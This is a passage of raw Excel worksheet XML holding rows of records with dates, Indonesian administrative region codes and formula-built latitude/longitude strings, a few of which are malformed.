      </c>
      <c r="U3916" s="5">
        <v>1104489137</v>
      </c>
      <c r="V3916" s="5" t="s">
        <v>17984</v>
      </c>
      <c r="W3916" s="5">
        <v>-75496045</v>
      </c>
      <c r="X3916" t="s">
        <v>21715</v>
      </c>
      <c r="Y3916" t="str">
        <f t="shared" si="61"/>
        <v>-7.5496045,110.4489137</v>
      </c>
    </row>
    <row r="3917" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3917">
        <v>298498</v>
      </c>
      <c r="B3917" s="1">
        <v>44480</v>
      </c>
      <c r="C3917" t="s">
        <v>13074</v>
      </c>
      <c r="D3917" t="s">
        <v>22</v>
      </c>
      <c r="E3917" t="s">
        <v>23</v>
      </c>
      <c r="F3917" t="s">
        <v>13075</v>
      </c>
      <c r="H3917" t="s">
        <v>7086</v>
      </c>
      <c r="I3917" t="s">
        <v>7733</v>
      </c>
      <c r="J3917" t="s">
        <v>1128</v>
      </c>
      <c r="L3917" t="s">
        <v>13076</v>
      </c>
      <c r="U3917" s="5">
        <v>1260186768</v>
      </c>
      <c r="V3917" s="5" t="s">
        <v>17985</v>
      </c>
      <c r="W3917" s="5">
        <v>7742196</v>
      </c>
      <c r="X3917" t="s">
        <v>21716</v>
      </c>
      <c r="Y3917" t="str">
        <f t="shared" si="61"/>
        <v>7.742196,126.0186768</v>
      </c>
    </row>
    <row r="3918" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3918">
        <v>298497</v>
      </c>
      <c r="B3918" s="1">
        <v>44480</v>
      </c>
      <c r="C3918" t="s">
        <v>13077</v>
      </c>
      <c r="D3918" t="s">
        <v>22</v>
      </c>
      <c r="E3918" t="s">
        <v>23</v>
      </c>
      <c r="F3918" t="s">
        <v>13078</v>
      </c>
      <c r="H3918" t="s">
        <v>26</v>
      </c>
      <c r="I3918" t="s">
        <v>137</v>
      </c>
      <c r="J3918" t="s">
        <v>7171</v>
      </c>
      <c r="L3918" t="s">
        <v>13079</v>
      </c>
      <c r="M3918">
        <v>6401080006</v>
      </c>
      <c r="N3918">
        <v>6401080</v>
      </c>
      <c r="O3918">
        <v>6401</v>
      </c>
      <c r="P3918">
        <v>64</v>
      </c>
      <c r="Q3918" t="s">
        <v>13058</v>
      </c>
      <c r="R3918" t="s">
        <v>13058</v>
      </c>
      <c r="S3918" t="s">
        <v>13059</v>
      </c>
      <c r="T3918" t="s">
        <v>1308</v>
      </c>
      <c r="U3918" s="5">
        <v>1163234997</v>
      </c>
      <c r="V3918" s="5" t="s">
        <v>17986</v>
      </c>
      <c r="W3918" s="5">
        <v>-15214383</v>
      </c>
      <c r="X3918" t="s">
        <v>21717</v>
      </c>
      <c r="Y3918" t="str">
        <f t="shared" si="61"/>
        <v>-1.5214383,116.3234997</v>
      </c>
    </row>
    <row r="3919" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3919">
        <v>298517</v>
      </c>
      <c r="B3919" s="1">
        <v>44483</v>
      </c>
      <c r="C3919" t="s">
        <v>13080</v>
      </c>
      <c r="D3919" t="s">
        <v>22</v>
      </c>
      <c r="E3919" t="s">
        <v>23</v>
      </c>
      <c r="F3919" t="s">
        <v>13081</v>
      </c>
      <c r="G3919" t="s">
        <v>13082</v>
      </c>
      <c r="H3919" t="s">
        <v>26</v>
      </c>
      <c r="I3919" t="s">
        <v>886</v>
      </c>
      <c r="J3919" t="s">
        <v>1879</v>
      </c>
      <c r="M3919">
        <v>3173080003</v>
      </c>
      <c r="N3919">
        <v>3173080</v>
      </c>
      <c r="O3919">
        <v>3173</v>
      </c>
      <c r="P3919">
        <v>31</v>
      </c>
      <c r="Q3919" t="s">
        <v>157</v>
      </c>
      <c r="R3919" t="s">
        <v>157</v>
      </c>
      <c r="S3919" t="s">
        <v>62</v>
      </c>
      <c r="T3919" t="s">
        <v>33</v>
      </c>
      <c r="U3919" s="5">
        <v>1068219566</v>
      </c>
      <c r="V3919" s="5" t="s">
        <v>17987</v>
      </c>
      <c r="W3919" s="5">
        <v>-61760223</v>
      </c>
      <c r="X3919" t="s">
        <v>21718</v>
      </c>
      <c r="Y3919" t="str">
        <f t="shared" si="61"/>
        <v>-6.1760223,106.8219566</v>
      </c>
    </row>
    <row r="3920" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3920">
        <v>298521</v>
      </c>
      <c r="B3920" s="1">
        <v>44484</v>
      </c>
      <c r="C3920" t="s">
        <v>13083</v>
      </c>
      <c r="D3920" t="s">
        <v>22</v>
      </c>
      <c r="E3920" t="s">
        <v>23</v>
      </c>
      <c r="F3920" t="s">
        <v>13084</v>
      </c>
      <c r="G3920" t="s">
        <v>13085</v>
      </c>
      <c r="H3920" t="s">
        <v>26</v>
      </c>
      <c r="I3920" t="s">
        <v>1651</v>
      </c>
      <c r="J3920" t="s">
        <v>7178</v>
      </c>
      <c r="L3920" t="s">
        <v>13086</v>
      </c>
      <c r="M3920">
        <v>1871071001</v>
      </c>
      <c r="N3920">
        <v>1871071</v>
      </c>
      <c r="O3920">
        <v>1871</v>
      </c>
      <c r="P3920">
        <v>18</v>
      </c>
      <c r="Q3920" t="s">
        <v>13087</v>
      </c>
      <c r="R3920" t="s">
        <v>13088</v>
      </c>
      <c r="S3920" t="s">
        <v>7181</v>
      </c>
      <c r="T3920" t="s">
        <v>2082</v>
      </c>
      <c r="U3920" s="5">
        <v>1051825047</v>
      </c>
      <c r="V3920" s="5" t="s">
        <v>17988</v>
      </c>
      <c r="W3920" s="5">
        <v>-54166703</v>
      </c>
      <c r="X3920" t="s">
        <v>21719</v>
      </c>
      <c r="Y3920" t="str">
        <f t="shared" si="61"/>
        <v>-5.4166703,105.1825047</v>
      </c>
    </row>
    <row r="3921" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3921">
        <v>298526</v>
      </c>
      <c r="B3921" s="1">
        <v>44484</v>
      </c>
      <c r="C3921" t="s">
        <v>13089</v>
      </c>
      <c r="D3921" t="s">
        <v>22</v>
      </c>
      <c r="E3921" t="s">
        <v>23</v>
      </c>
      <c r="F3921" t="s">
        <v>13090</v>
      </c>
      <c r="H3921" t="s">
        <v>7086</v>
      </c>
      <c r="I3921" t="s">
        <v>7733</v>
      </c>
      <c r="J3921" t="s">
        <v>7277</v>
      </c>
      <c r="L3921" t="s">
        <v>13091</v>
      </c>
      <c r="M3921">
        <v>5104050008</v>
      </c>
      <c r="N3921">
        <v>5104050</v>
      </c>
      <c r="O3921">
        <v>5104</v>
      </c>
      <c r="P3921">
        <v>51</v>
      </c>
      <c r="Q3921" t="s">
        <v>13092</v>
      </c>
      <c r="R3921" t="s">
        <v>13093</v>
      </c>
      <c r="S3921" t="s">
        <v>13094</v>
      </c>
      <c r="T3921" t="s">
        <v>7282</v>
      </c>
      <c r="U3921" s="5">
        <v>1152546501</v>
      </c>
      <c r="V3921" s="5" t="s">
        <v>17989</v>
      </c>
      <c r="W3921" s="5">
        <v>-84786226</v>
      </c>
      <c r="X3921" t="s">
        <v>21720</v>
      </c>
      <c r="Y3921" t="str">
        <f t="shared" si="61"/>
        <v>-8.4786226,115.2546501</v>
      </c>
    </row>
    <row r="3922" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3922">
        <v>298519</v>
      </c>
      <c r="B3922" s="1">
        <v>44484</v>
      </c>
      <c r="C3922" t="s">
        <v>13095</v>
      </c>
      <c r="D3922" t="s">
        <v>22</v>
      </c>
      <c r="E3922" t="s">
        <v>23</v>
      </c>
      <c r="F3922" t="s">
        <v>13096</v>
      </c>
      <c r="G3922" t="s">
        <v>13097</v>
      </c>
      <c r="H3922" t="s">
        <v>26</v>
      </c>
      <c r="I3922" t="s">
        <v>1263</v>
      </c>
      <c r="J3922" t="s">
        <v>6509</v>
      </c>
      <c r="L3922" t="s">
        <v>13098</v>
      </c>
      <c r="M3922">
        <v>6308010021</v>
      </c>
      <c r="N3922">
        <v>6308010</v>
      </c>
      <c r="O3922">
        <v>6308</v>
      </c>
      <c r="P3922">
        <v>63</v>
      </c>
      <c r="Q3922" t="s">
        <v>13099</v>
      </c>
      <c r="R3922" t="s">
        <v>13100</v>
      </c>
      <c r="S3922" t="s">
        <v>13101</v>
      </c>
      <c r="T3922" t="s">
        <v>6513</v>
      </c>
      <c r="U3922" s="5">
        <v>1150804567</v>
      </c>
      <c r="V3922" s="5" t="s">
        <v>17990</v>
      </c>
      <c r="W3922" s="5">
        <v>-24597739</v>
      </c>
      <c r="X3922" t="s">
        <v>21721</v>
      </c>
      <c r="Y3922" t="str">
        <f t="shared" si="61"/>
        <v>-2.4597739,115.0804567</v>
      </c>
    </row>
    <row r="3923" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3923">
        <v>298531</v>
      </c>
      <c r="B3923" s="1">
        <v>44485</v>
      </c>
      <c r="C3923" t="s">
        <v>13102</v>
      </c>
      <c r="D3923" t="s">
        <v>22</v>
      </c>
      <c r="E3923" t="s">
        <v>23</v>
      </c>
      <c r="F3923" t="s">
        <v>13103</v>
      </c>
      <c r="G3923" t="s">
        <v>13104</v>
      </c>
      <c r="H3923" t="s">
        <v>7086</v>
      </c>
      <c r="I3923" t="s">
        <v>7421</v>
      </c>
      <c r="J3923" t="s">
        <v>7277</v>
      </c>
      <c r="L3923" t="s">
        <v>13105</v>
      </c>
      <c r="M3923">
        <v>5107040005</v>
      </c>
      <c r="N3923">
        <v>5107040</v>
      </c>
      <c r="O3923">
        <v>5107</v>
      </c>
      <c r="P3923">
        <v>51</v>
      </c>
      <c r="Q3923" t="s">
        <v>9815</v>
      </c>
      <c r="R3923" t="s">
        <v>9815</v>
      </c>
      <c r="S3923" t="s">
        <v>13106</v>
      </c>
      <c r="T3923" t="s">
        <v>7282</v>
      </c>
      <c r="U3923" s="5">
        <v>1156124223</v>
      </c>
      <c r="V3923" s="5" t="s">
        <v>17991</v>
      </c>
      <c r="W3923" s="5">
        <v>-84347302</v>
      </c>
      <c r="X3923" t="s">
        <v>21722</v>
      </c>
      <c r="Y3923" t="str">
        <f t="shared" si="61"/>
        <v>-8.4347302,115.6124223</v>
      </c>
    </row>
    <row r="3924" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3924">
        <v>298530</v>
      </c>
      <c r="B3924" s="1">
        <v>44485</v>
      </c>
      <c r="C3924" t="s">
        <v>13107</v>
      </c>
      <c r="D3924" t="s">
        <v>22</v>
      </c>
      <c r="E3924" t="s">
        <v>23</v>
      </c>
      <c r="F3924" t="s">
        <v>13108</v>
      </c>
      <c r="G3924" t="s">
        <v>13109</v>
      </c>
      <c r="H3924" t="s">
        <v>7086</v>
      </c>
      <c r="I3924" t="s">
        <v>7087</v>
      </c>
      <c r="J3924" t="s">
        <v>7277</v>
      </c>
      <c r="L3924" t="s">
        <v>13110</v>
      </c>
      <c r="M3924">
        <v>5107040005</v>
      </c>
      <c r="N3924">
        <v>5107040</v>
      </c>
      <c r="O3924">
        <v>5107</v>
      </c>
      <c r="P3924">
        <v>51</v>
      </c>
      <c r="Q3924" t="s">
        <v>9815</v>
      </c>
      <c r="R3924" t="s">
        <v>9815</v>
      </c>
      <c r="S3924" t="s">
        <v>13106</v>
      </c>
      <c r="T3924" t="s">
        <v>7282</v>
      </c>
      <c r="U3924" s="5">
        <v>1156124246</v>
      </c>
      <c r="V3924" s="5" t="s">
        <v>17992</v>
      </c>
      <c r="W3924" s="5">
        <v>-84347306</v>
      </c>
      <c r="X3924" t="s">
        <v>21723</v>
      </c>
      <c r="Y3924" t="str">
        <f t="shared" si="61"/>
        <v>-8.4347306,115.6124246</v>
      </c>
    </row>
    <row r="3925" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3925">
        <v>298533</v>
      </c>
      <c r="B3925" s="1">
        <v>44487</v>
      </c>
      <c r="C3925" t="s">
        <v>13111</v>
      </c>
      <c r="D3925" t="s">
        <v>22</v>
      </c>
      <c r="E3925" t="s">
        <v>23</v>
      </c>
      <c r="F3925" t="s">
        <v>13112</v>
      </c>
      <c r="G3925" t="s">
        <v>13113</v>
      </c>
      <c r="H3925" t="s">
        <v>26</v>
      </c>
      <c r="I3925" t="s">
        <v>13114</v>
      </c>
      <c r="J3925" t="s">
        <v>2627</v>
      </c>
      <c r="M3925">
        <v>3275031003</v>
      </c>
      <c r="N3925">
        <v>3275031</v>
      </c>
      <c r="O3925">
        <v>3275</v>
      </c>
      <c r="P3925">
        <v>32</v>
      </c>
      <c r="Q3925" t="s">
        <v>988</v>
      </c>
      <c r="R3925" t="s">
        <v>574</v>
      </c>
      <c r="S3925" t="s">
        <v>41</v>
      </c>
      <c r="T3925" t="s">
        <v>42</v>
      </c>
      <c r="U3925" s="5">
        <v>1070187449</v>
      </c>
      <c r="V3925" s="5" t="s">
        <v>17993</v>
      </c>
      <c r="W3925" s="5">
        <v>-62867190</v>
      </c>
      <c r="X3925" t="s">
        <v>21724</v>
      </c>
      <c r="Y3925" t="str">
        <f t="shared" si="61"/>
        <v>-6.2867190,107.0187449</v>
      </c>
    </row>
    <row r="3926" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3926">
        <v>298567</v>
      </c>
      <c r="B3926" s="1">
        <v>44488</v>
      </c>
      <c r="C3926" t="s">
        <v>13115</v>
      </c>
      <c r="D3926" t="s">
        <v>22</v>
      </c>
      <c r="E3926" t="s">
        <v>23</v>
      </c>
      <c r="F3926" t="s">
        <v>13116</v>
      </c>
      <c r="G3926" t="s">
        <v>13117</v>
      </c>
      <c r="H3926" t="s">
        <v>7086</v>
      </c>
      <c r="I3926" t="s">
        <v>13118</v>
      </c>
      <c r="J3926" t="s">
        <v>7277</v>
      </c>
      <c r="L3926" t="s">
        <v>13119</v>
      </c>
      <c r="M3926">
        <v>5107050010</v>
      </c>
      <c r="N3926">
        <v>5107050</v>
      </c>
      <c r="O3926">
        <v>5107</v>
      </c>
      <c r="P3926">
        <v>51</v>
      </c>
      <c r="Q3926" t="s">
        <v>13120</v>
      </c>
      <c r="R3926" t="s">
        <v>13121</v>
      </c>
      <c r="S3926" t="s">
        <v>13106</v>
      </c>
      <c r="T3926" t="s">
        <v>7282</v>
      </c>
      <c r="U3926" s="5">
        <v>1155873406</v>
      </c>
      <c r="V3926" s="5" t="s">
        <v>17994</v>
      </c>
      <c r="W3926" s="5">
        <v>-83530194</v>
      </c>
      <c r="X3926" t="s">
        <v>21725</v>
      </c>
      <c r="Y3926" t="str">
        <f t="shared" si="61"/>
        <v>-8.3530194,115.5873406</v>
      </c>
    </row>
    <row r="3927" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3927">
        <v>298611</v>
      </c>
      <c r="B3927" s="1">
        <v>44488</v>
      </c>
      <c r="C3927" t="s">
        <v>13122</v>
      </c>
      <c r="D3927" t="s">
        <v>22</v>
      </c>
      <c r="E3927" t="s">
        <v>23</v>
      </c>
      <c r="F3927" t="s">
        <v>13123</v>
      </c>
      <c r="H3927" t="s">
        <v>7086</v>
      </c>
      <c r="I3927" t="s">
        <v>12245</v>
      </c>
      <c r="J3927" t="s">
        <v>7277</v>
      </c>
      <c r="L3927" t="s">
        <v>13124</v>
      </c>
      <c r="M3927">
        <v>5107050009</v>
      </c>
      <c r="N3927">
        <v>5107050</v>
      </c>
      <c r="O3927">
        <v>5107</v>
      </c>
      <c r="P3927">
        <v>51</v>
      </c>
      <c r="Q3927" t="s">
        <v>13125</v>
      </c>
      <c r="R3927" t="s">
        <v>13121</v>
      </c>
      <c r="S3927" t="s">
        <v>13106</v>
      </c>
      <c r="T3927" t="s">
        <v>7282</v>
      </c>
      <c r="U3927" s="5">
        <v>1156164237</v>
      </c>
      <c r="V3927" s="5" t="s">
        <v>17995</v>
      </c>
      <c r="W3927" s="5">
        <v>-83427833</v>
      </c>
      <c r="X3927" t="s">
        <v>21726</v>
      </c>
      <c r="Y3927" t="str">
        <f t="shared" si="61"/>
        <v>-8.3427833,115.6164237</v>
      </c>
    </row>
    <row r="3928" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3928">
        <v>298546</v>
      </c>
      <c r="B3928" s="1">
        <v>44488</v>
      </c>
      <c r="C3928" t="s">
        <v>13126</v>
      </c>
      <c r="D3928" t="s">
        <v>22</v>
      </c>
      <c r="E3928" t="s">
        <v>23</v>
      </c>
      <c r="F3928" t="s">
        <v>13127</v>
      </c>
      <c r="H3928" t="s">
        <v>26</v>
      </c>
      <c r="I3928" t="s">
        <v>383</v>
      </c>
      <c r="J3928" t="s">
        <v>7444</v>
      </c>
      <c r="L3928" t="s">
        <v>13128</v>
      </c>
      <c r="M3928">
        <v>1771040002</v>
      </c>
      <c r="N3928">
        <v>1771040</v>
      </c>
      <c r="O3928">
        <v>1771</v>
      </c>
      <c r="P3928">
        <v>17</v>
      </c>
      <c r="Q3928" t="s">
        <v>13129</v>
      </c>
      <c r="R3928" t="s">
        <v>13130</v>
      </c>
      <c r="S3928" t="s">
        <v>7447</v>
      </c>
      <c r="T3928" t="s">
        <v>7447</v>
      </c>
      <c r="U3928" s="5">
        <v>1022745632</v>
      </c>
      <c r="V3928" s="5" t="s">
        <v>17996</v>
      </c>
      <c r="W3928" s="5">
        <v>-37787905</v>
      </c>
      <c r="X3928" t="s">
        <v>21727</v>
      </c>
      <c r="Y3928" t="str">
        <f t="shared" si="61"/>
        <v>-3.7787905,102.2745632</v>
      </c>
    </row>
    <row r="3929" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3929">
        <v>298677</v>
      </c>
      <c r="B3929" s="1">
        <v>44488</v>
      </c>
      <c r="C3929" t="s">
        <v>13131</v>
      </c>
      <c r="D3929" t="s">
        <v>22</v>
      </c>
      <c r="E3929" t="s">
        <v>23</v>
      </c>
      <c r="F3929" t="s">
        <v>13132</v>
      </c>
      <c r="G3929" t="s">
        <v>13133</v>
      </c>
      <c r="H3929" t="s">
        <v>26</v>
      </c>
      <c r="I3929" t="s">
        <v>3577</v>
      </c>
      <c r="J3929" t="s">
        <v>7171</v>
      </c>
      <c r="L3929" t="s">
        <v>13134</v>
      </c>
      <c r="M3929">
        <v>6472060011</v>
      </c>
      <c r="N3929">
        <v>6472060</v>
      </c>
      <c r="O3929">
        <v>6472</v>
      </c>
      <c r="P3929">
        <v>64</v>
      </c>
      <c r="Q3929" t="s">
        <v>7202</v>
      </c>
      <c r="R3929" t="s">
        <v>7203</v>
      </c>
      <c r="S3929" t="s">
        <v>7175</v>
      </c>
      <c r="T3929" t="s">
        <v>1308</v>
      </c>
      <c r="U3929" s="5">
        <v>1171683227</v>
      </c>
      <c r="V3929" s="5" t="s">
        <v>17997</v>
      </c>
      <c r="W3929" s="5">
        <v>-4271940</v>
      </c>
      <c r="X3929" t="s">
        <v>21728</v>
      </c>
      <c r="Y3929" t="str">
        <f t="shared" si="61"/>
        <v xml:space="preserve"> -0.4271940,117.1683227</v>
      </c>
    </row>
    <row r="3930" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3930">
        <v>298543</v>
      </c>
      <c r="B3930" s="1">
        <v>44488</v>
      </c>
      <c r="C3930" t="s">
        <v>13135</v>
      </c>
      <c r="D3930" t="s">
        <v>22</v>
      </c>
      <c r="E3930" t="s">
        <v>23</v>
      </c>
      <c r="F3930" t="s">
        <v>13136</v>
      </c>
      <c r="G3930" t="s">
        <v>13137</v>
      </c>
      <c r="H3930" t="s">
        <v>26</v>
      </c>
      <c r="I3930" t="s">
        <v>137</v>
      </c>
      <c r="J3930" t="s">
        <v>6038</v>
      </c>
      <c r="L3930" t="s">
        <v>13138</v>
      </c>
      <c r="M3930">
        <v>1212040012</v>
      </c>
      <c r="N3930">
        <v>1212040</v>
      </c>
      <c r="O3930">
        <v>1212</v>
      </c>
      <c r="P3930">
        <v>12</v>
      </c>
      <c r="Q3930" t="s">
        <v>13139</v>
      </c>
      <c r="R3930" t="s">
        <v>13140</v>
      </c>
      <c r="S3930" t="s">
        <v>8342</v>
      </c>
      <c r="T3930" t="s">
        <v>6043</v>
      </c>
      <c r="U3930" s="5">
        <v>985415511</v>
      </c>
      <c r="V3930" s="5" t="s">
        <v>17998</v>
      </c>
      <c r="W3930" s="5">
        <v>35559314</v>
      </c>
      <c r="X3930" t="s">
        <v>21729</v>
      </c>
      <c r="Y3930" t="str">
        <f t="shared" si="61"/>
        <v>3.5559314,985.415511</v>
      </c>
    </row>
    <row r="3931" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3931">
        <v>298554</v>
      </c>
      <c r="B3931" s="1">
        <v>44488</v>
      </c>
      <c r="C3931" t="s">
        <v>13141</v>
      </c>
      <c r="D3931" t="s">
        <v>22</v>
      </c>
      <c r="E3931" t="s">
        <v>23</v>
      </c>
      <c r="F3931" t="s">
        <v>13142</v>
      </c>
      <c r="H3931" t="s">
        <v>7086</v>
      </c>
      <c r="I3931" t="s">
        <v>7733</v>
      </c>
      <c r="J3931" t="s">
        <v>1128</v>
      </c>
      <c r="L3931" t="s">
        <v>13143</v>
      </c>
      <c r="U3931" s="5">
        <v>23514605</v>
      </c>
      <c r="V3931" s="5" t="s">
        <v>17999</v>
      </c>
      <c r="W3931" s="5">
        <v>488566964</v>
      </c>
      <c r="X3931" t="s">
        <v>21730</v>
      </c>
      <c r="Y3931" t="str">
        <f t="shared" si="61"/>
        <v>48.8566964,235.14605</v>
      </c>
    </row>
    <row r="3932" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3932">
        <v>298619</v>
      </c>
      <c r="B3932" s="1">
        <v>44488</v>
      </c>
      <c r="C3932" t="s">
        <v>13144</v>
      </c>
      <c r="D3932" t="s">
        <v>22</v>
      </c>
      <c r="E3932" t="s">
        <v>23</v>
      </c>
      <c r="F3932" t="s">
        <v>13145</v>
      </c>
      <c r="G3932" t="s">
        <v>13146</v>
      </c>
      <c r="H3932" t="s">
        <v>26</v>
      </c>
      <c r="I3932" t="s">
        <v>13147</v>
      </c>
      <c r="J3932" t="s">
        <v>7277</v>
      </c>
      <c r="L3932" t="s">
        <v>13148</v>
      </c>
      <c r="M3932">
        <v>5103020003</v>
      </c>
      <c r="N3932">
        <v>5103020</v>
      </c>
      <c r="O3932">
        <v>5103</v>
      </c>
      <c r="P3932">
        <v>51</v>
      </c>
      <c r="Q3932" t="s">
        <v>7280</v>
      </c>
      <c r="R3932" t="s">
        <v>7280</v>
      </c>
      <c r="S3932" t="s">
        <v>7281</v>
      </c>
      <c r="T3932" t="s">
        <v>7282</v>
      </c>
      <c r="U3932" s="5">
        <v>1151729554</v>
      </c>
      <c r="V3932" s="5" t="s">
        <v>18000</v>
      </c>
      <c r="W3932" s="5">
        <v>-87280138</v>
      </c>
      <c r="X3932" t="s">
        <v>21731</v>
      </c>
      <c r="Y3932" t="str">
        <f t="shared" si="61"/>
        <v>-8.7280138,115.1729554</v>
      </c>
    </row>
    <row r="3933" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3933">
        <v>298642</v>
      </c>
      <c r="B3933" s="1">
        <v>44488</v>
      </c>
      <c r="C3933" t="s">
        <v>13149</v>
      </c>
      <c r="D3933" t="s">
        <v>22</v>
      </c>
      <c r="E3933" t="s">
        <v>23</v>
      </c>
      <c r="F3933" t="s">
        <v>13150</v>
      </c>
      <c r="G3933" t="s">
        <v>13151</v>
      </c>
      <c r="H3933" t="s">
        <v>7086</v>
      </c>
      <c r="I3933" t="s">
        <v>13152</v>
      </c>
      <c r="J3933" t="s">
        <v>7277</v>
      </c>
      <c r="L3933" t="s">
        <v>13153</v>
      </c>
      <c r="M3933">
        <v>5102080006</v>
      </c>
      <c r="N3933">
        <v>5102080</v>
      </c>
      <c r="O3933">
        <v>5102</v>
      </c>
      <c r="P3933">
        <v>51</v>
      </c>
      <c r="Q3933" t="s">
        <v>13154</v>
      </c>
      <c r="R3933" t="s">
        <v>13155</v>
      </c>
      <c r="S3933" t="s">
        <v>13156</v>
      </c>
      <c r="T3933" t="s">
        <v>7282</v>
      </c>
      <c r="U3933" s="5">
        <v>1150906384</v>
      </c>
      <c r="V3933" s="5" t="s">
        <v>18001</v>
      </c>
      <c r="W3933" s="5">
        <v>-83304990</v>
      </c>
      <c r="X3933" t="s">
        <v>21732</v>
      </c>
      <c r="Y3933" t="str">
        <f t="shared" si="61"/>
        <v>-8.3304990,115.0906384</v>
      </c>
    </row>
    <row r="3934" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3934">
        <v>298610</v>
      </c>
      <c r="B3934" s="1">
        <v>44488</v>
      </c>
      <c r="C3934" t="s">
        <v>13157</v>
      </c>
      <c r="D3934" t="s">
        <v>22</v>
      </c>
      <c r="E3934" t="s">
        <v>23</v>
      </c>
      <c r="F3934" t="s">
        <v>13158</v>
      </c>
      <c r="H3934" t="s">
        <v>7086</v>
      </c>
      <c r="I3934" t="s">
        <v>7733</v>
      </c>
      <c r="J3934" t="s">
        <v>7277</v>
      </c>
      <c r="L3934" t="s">
        <v>13159</v>
      </c>
      <c r="M3934">
        <v>5107050008</v>
      </c>
      <c r="N3934">
        <v>5107050</v>
      </c>
      <c r="O3934">
        <v>5107</v>
      </c>
      <c r="P3934">
        <v>51</v>
      </c>
      <c r="Q3934" t="s">
        <v>13160</v>
      </c>
      <c r="R3934" t="s">
        <v>13121</v>
      </c>
      <c r="S3934" t="s">
        <v>13106</v>
      </c>
      <c r="T3934" t="s">
        <v>7282</v>
      </c>
      <c r="U3934" s="5">
        <v>1156120706</v>
      </c>
      <c r="V3934" s="5" t="s">
        <v>18002</v>
      </c>
      <c r="W3934" s="5">
        <v>-83587992</v>
      </c>
      <c r="X3934" t="s">
        <v>21733</v>
      </c>
      <c r="Y3934" t="str">
        <f t="shared" si="61"/>
        <v>-8.3587992,115.6120706</v>
      </c>
    </row>
    <row r="3935" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3935">
        <v>298639</v>
      </c>
      <c r="B3935" s="1">
        <v>44488</v>
      </c>
      <c r="C3935" t="s">
        <v>13161</v>
      </c>
      <c r="D3935" t="s">
        <v>22</v>
      </c>
      <c r="E3935" t="s">
        <v>23</v>
      </c>
      <c r="F3935" t="s">
        <v>13162</v>
      </c>
      <c r="G3935" t="s">
        <v>13163</v>
      </c>
      <c r="H3935" t="s">
        <v>7086</v>
      </c>
      <c r="I3935" t="s">
        <v>7087</v>
      </c>
      <c r="J3935" t="s">
        <v>7277</v>
      </c>
      <c r="L3935" t="s">
        <v>13164</v>
      </c>
      <c r="M3935">
        <v>5107050009</v>
      </c>
      <c r="N3935">
        <v>5107050</v>
      </c>
      <c r="O3935">
        <v>5107</v>
      </c>
      <c r="P3935">
        <v>51</v>
      </c>
      <c r="Q3935" t="s">
        <v>13125</v>
      </c>
      <c r="R3935" t="s">
        <v>13121</v>
      </c>
      <c r="S3935" t="s">
        <v>13106</v>
      </c>
      <c r="T3935" t="s">
        <v>7282</v>
      </c>
      <c r="U3935" s="5">
        <v>1156120276</v>
      </c>
      <c r="V3935" s="5" t="s">
        <v>18003</v>
      </c>
      <c r="W3935" s="5">
        <v>-83479613</v>
      </c>
      <c r="X3935" t="s">
        <v>21734</v>
      </c>
      <c r="Y3935" t="str">
        <f t="shared" si="61"/>
        <v>-8.3479613,115.6120276</v>
      </c>
    </row>
    <row r="3936" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3936">
        <v>298593</v>
      </c>
      <c r="B3936" s="1">
        <v>44488</v>
      </c>
      <c r="C3936" t="s">
        <v>13165</v>
      </c>
      <c r="D3936" t="s">
        <v>22</v>
      </c>
      <c r="E3936" t="s">
        <v>23</v>
      </c>
      <c r="F3936" s="3" t="s">
        <v>13166</v>
      </c>
      <c r="H3936" t="s">
        <v>7086</v>
      </c>
      <c r="I3936" t="s">
        <v>7087</v>
      </c>
      <c r="J3936" t="s">
        <v>7277</v>
      </c>
      <c r="L3936" t="s">
        <v>13167</v>
      </c>
      <c r="M3936">
        <v>5107050013</v>
      </c>
      <c r="N3936">
        <v>5107050</v>
      </c>
      <c r="O3936">
        <v>5107</v>
      </c>
      <c r="P3936">
        <v>51</v>
      </c>
      <c r="Q3936" t="s">
        <v>13168</v>
      </c>
      <c r="R3936" t="s">
        <v>13121</v>
      </c>
      <c r="S3936" t="s">
        <v>13106</v>
      </c>
      <c r="T3936" t="s">
        <v>7282</v>
      </c>
      <c r="U3936" s="5">
        <v>1156692834</v>
      </c>
      <c r="V3936" s="5" t="s">
        <v>18004</v>
      </c>
      <c r="W3936" s="5">
        <v>-83513515</v>
      </c>
      <c r="X3936" t="s">
        <v>21735</v>
      </c>
      <c r="Y3936" t="str">
        <f t="shared" si="61"/>
        <v>-8.3513515,115.6692834</v>
      </c>
    </row>
    <row r="3937" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3937">
        <v>298629</v>
      </c>
      <c r="B3937" s="1">
        <v>44488</v>
      </c>
      <c r="C3937" t="s">
        <v>13169</v>
      </c>
      <c r="D3937" t="s">
        <v>22</v>
      </c>
      <c r="E3937" t="s">
        <v>23</v>
      </c>
      <c r="F3937" t="s">
        <v>13170</v>
      </c>
      <c r="G3937" t="s">
        <v>13171</v>
      </c>
      <c r="H3937" t="s">
        <v>7086</v>
      </c>
      <c r="I3937" t="s">
        <v>7733</v>
      </c>
      <c r="J3937" t="s">
        <v>7277</v>
      </c>
      <c r="L3937" t="s">
        <v>13172</v>
      </c>
      <c r="M3937">
        <v>5107050012</v>
      </c>
      <c r="N3937">
        <v>5107050</v>
      </c>
      <c r="O3937">
        <v>5107</v>
      </c>
      <c r="P3937">
        <v>51</v>
      </c>
      <c r="Q3937" t="s">
        <v>13173</v>
      </c>
      <c r="R3937" t="s">
        <v>13121</v>
      </c>
      <c r="S3937" t="s">
        <v>13106</v>
      </c>
      <c r="T3937" t="s">
        <v>7282</v>
      </c>
      <c r="U3937" s="5">
        <v>1156356377</v>
      </c>
      <c r="V3937" s="5" t="s">
